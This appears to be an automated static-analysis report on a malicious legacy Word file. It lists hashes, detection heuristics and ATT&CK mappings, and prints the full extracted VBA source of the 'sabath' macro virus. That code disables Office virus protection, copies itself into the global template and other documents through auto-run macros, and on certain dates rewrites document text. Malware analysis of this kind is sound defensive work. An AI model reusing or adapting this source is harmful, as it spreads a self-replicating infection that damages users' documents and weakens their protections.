Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a52706d2b6244927…

MALICIOUS

Office (OLE)

38.5 KB Created: 2003-11-20 14:02:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: d3ae952d5d7bc0bdd2917f717696cf83 SHA-1: cda474373a463ecec4313d94f580c8ab860275cb SHA-256: a52706d2b6244927decea0613e50a4640a8c463066705410a47f9b05df0bd61e
196 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing VBA macros, including AutoOpen and Auto_Close, which are commonly used for malicious purposes. The 'sabath' macro attempts to export itself to 'c:\sabath.drv', suggesting an intent to execute further malicious code or establish persistence. The ClamAV detection as 'Win.Trojan.Pivis-2' further supports its malicious nature.

Heuristics 6

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub autoclose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3836 bytes
SHA-256: 5de78fe5dfb212805f42a0981c9be752363638f0e3f7ba9ecdd3fa95648870a8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "sabath"
'ßìùèê, íå ãîíè! Òû ãîíèøü, ÿìùèê!
Sub ViewVBCode()
    On Error Resume Next
    Call sabath
End Sub
Sub sabath()
    
    
On Error Resume Next

Options.ConfirmConversions = False
Options.VirusProtection = False

'Áåäó íàCLICKàë...
Options.SaveNormalPrompt = False
ActiveDocument.VBProject.VBComponents("sabath").Export "c:\sabath.drv"
ActiveDocument.ReadOnlyRecommended = False
'Håò ïîâåñòè ïå÷àëüíåå íà ñâåòå,÷åì ïîâåñòü î çàêëèíèâøåì RESETe...
chislo = Int(Rnd * 100)
'Hàãëîñòü - âòîðîå ñ÷àñòüå.
'À çîìáè çäåñü òèõèå
'À íå ïîéòè ëè ìíå íà ðàáîòó,- ïîäóìàë ÿ. È íå ïîøåë.
'Àëêîãîëü â ìàëûõ äîçàõ áåçâðåäåí â ëþáîì êîëè÷åñòâå!
'Àìåðèêàíöû - ìû èç íåãðîâ çâåçä íå äåëàåì
    If chislo = 99 Then MsgBox "Ïðèâåò VicodinES îò _\` /4 |3 /4 + |-|", vbSystemModal

If Day(Now()) = 1 Or 2 Or 3 Or 4 Or 5 Or 6 Or 13 Or 15 Or 17 Or 18 Or 19 Or 23 Or 25 Or 30 Or 31 Then Call Tooday

With Dialogs(wdDialogFileSummaryInfo)
'Hà õàëÿâó è "ÐÀÌÀ" - ñëèâî÷íîå ìàñëî.
    .Author = " _\` /4 |3 /4 + |-| "
    .Subject = "Viva VicodinES"
    .Comments = "_\` /4 |3 /4 + |-|   REproduction of Vic's XIXpoppy"
    .Execute
'ßìùèê, íå ãîíè! Òû ãîíèøü, ÿìùèê!

End With
If NormalTemplate.VBProject.VBComponents.Item("sabath").Name <> "sabath" Then TemplateNameCheck = True
If ActiveDocument.VBProject.VBComponents.Item("sabath").Name <> "sabath" Then ActiveDocNameCheck = True
If TemplateNameCheck = True And ActiveDocNameCheck = False Then Set VIRIIconst = NormalTemplate.VBProject.VBComponents
If TemplateNameCheck = False And ActiveDocNameCheck = True Then Set VIRIIconst = ActiveDocument.VBProject.VBComponents
VIRIIconst.import "c:\sabath.drv"
If activeinst = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
If ActiveDocNameCheck = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save
'MsgBox "   _\` /4 |3 /4 + |-| tribute to VicodinES "
IDontKnowWhatItWas:
End Sub
Sub HelpAbout()
    On Error Resume Next

    MsgBox " _\` /4 |3 /4 + |-|  ", vbInformation
End Sub
Sub AutoOpen()
    On Error Resume Next
    
ShowVisualBasicEditor = False 'net VB editora
    Call sabath

End Sub
Sub ToolsMacro()
    On Error Resume Next
    Call sabath
End Sub


Sub Tooday()
    On Error Resume Next
        Selection.HomeKey Unit:=wdStory
'Áåç òðóäà íå çàñóíåøü è òóäà.
'Áåðåãè åãî êàê çåíèöó - âî êàê.
        Selection.Find.ClearFormatting
        Selection.Find.Replacement.ClearFormatting
        With Selection.Find
            .Text = " îí "
            .Replacement.Text = "_\` /4 |3 /4 + |-|"
            .Forward = True
            .Wrap = wdFindContinue
            .Format = False
            .MatchCase = False
            .MatchWholeWord = False
            .MatchAllWordForms = True
        End With
        

        Selection.Find.Execute Replace:=wdReplaceAll
If ActiveDocument.Saved = False Then ActiveDocument.Save
End Sub

Sub FileTemplates()
    On Error Resume Next
    With Application

    Call sabath
End Sub
'password for view is xx3
Sub autoclose()
On Error Resume Next
StatusBar = "Get Ur NEW AVir TODAY!!! _\` A |3 A T |-|"


End Sub